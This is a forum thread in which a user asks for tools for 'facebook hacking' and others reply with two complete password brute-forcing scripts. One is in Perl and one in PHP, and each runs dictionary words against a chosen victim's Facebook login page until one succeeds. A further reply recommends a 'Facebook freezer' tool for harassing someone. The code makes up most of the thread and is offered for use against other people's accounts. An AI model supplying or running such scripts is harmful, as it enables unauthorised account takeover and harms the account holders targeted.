Anyone know any bruteforce programmes worth downloading- or have any links?
Just for facebook hacking and such.
cheers,
Outsider141
Anyone know any bruteforce programmes worth downloading- or have any links?
Just for facebook hacking and such.
cheers,
Outsider141
.....
And you think you can actually brute-force facebook with a simple program...
Allegedly so.
A guy called Edgard Chammas figured out that the login.php page on Facebook allows infinite login attempts, so he made this Pearl-scripted bot to be used with an own dictionary for bruteforcing
I hope this helps ^^,#!/usr/bin/perl
# Facebook Password Breaker by Edgard Chammas [454447415244]
# This program is for educational purposes only.
# The author is not responsible for whatever you do with this program.
# Feel free to distribute this code provided you don't delete this header.
use WWW::Mechanize;
print "\n";
print "**************************************************************\n";
print "* Facebook Password Breaker by Edgard Chammas [454447415244] *\n";
print "**************************************************************\n";
print "\n";
my $stop = 0;
my $foundPassword = "";
if($#ARGV != 1 ){
print "Usage: fpb.pl [Username] [Dictionary] \n";
}
else{
if (open(DAT, $ARGV[1])) {
my $URL = "https://login.facebook.com/login.php";
my $URL2 = "http://facebook.com/home.php";
my $proxy = "";
my $facebookUser = "email";
my $facebookPwd = "pass";
my $line = "";
my $lnum = 1;
my $mech = WWW::Mechanize->new; $mech->agent_alias( 'Windows IE 6' );
$mech->proxy(['https', 'http', 'ftp'], $proxy);
print "* Launching attack on user: \"$ARGV[0]\"\n\n";
while (($line = <DAT>) && (!$stop)) {
chomp($line); print "* Trying password \"$line\" => ";
my $respond = $mech->get($URL);
$mech->form_with_fields($facebookUser,$facebookPwd);
$mech->set_fields($facebookUser => $ARGV[0], $facebookPwd => $line);
$mech->click('login'); my $respond = $mech->get($URL2);
my $page = $mech->content;
if ($page =~ /Logout/i){
print "Succeded!\n";
$foundPassword = $line;
$stop = 1;
}
else{
print "Failed\n";
}
}
}
else{
print "* Couldn't open the dictionary file \"$ARGV[1]\"\n";
}
close(DAT);
if (!$stop){
print "\n* Password not found for user \"$ARGV[0]\"\n";
}
else{
print "\n* The password for \"$ARGV[0]\" is \"$foundPassword\"\n";
} print "\n";
print "*****************************************************************\n";
print "\n";
}
Far as im aware if u enter the password wrong too many times it locks you out.
If you need me you have my skype, if you don't have my skype then you don't need me.
Yes, that's what I'm trying to say. It's not locking you out if you try it 1000 or even more times. Like if you try to log in many times directly from their homepage, then you would probably get prompted to wait for 15 min or so when typing it wrong like 3, 5 or 10 times![]()
If you can't pearl, then here's a php version of it:
Have an empty "cookie.txt"-file and your dictionary text-file in the same directory as this php-file in your host.<?php
################################
# FaceBook BruteForcer
################################
set_time_limit(0);
$username ="THE-VICTIMS-MAIL"; // username to bruteforce
$dictionary ="YOUR-DICTIONARY-FILE.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - Password found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
Hope this helps![]()
Last edited by Ebonesser; 09-22-2009 at 01:12 PM.
But outsider141, if you just want to irritate someone on facebook then I recommend Facebook freezer. I've uploaded it here: http://www.mmowned.com/forums/genera...faceboook.html
lols in this thread...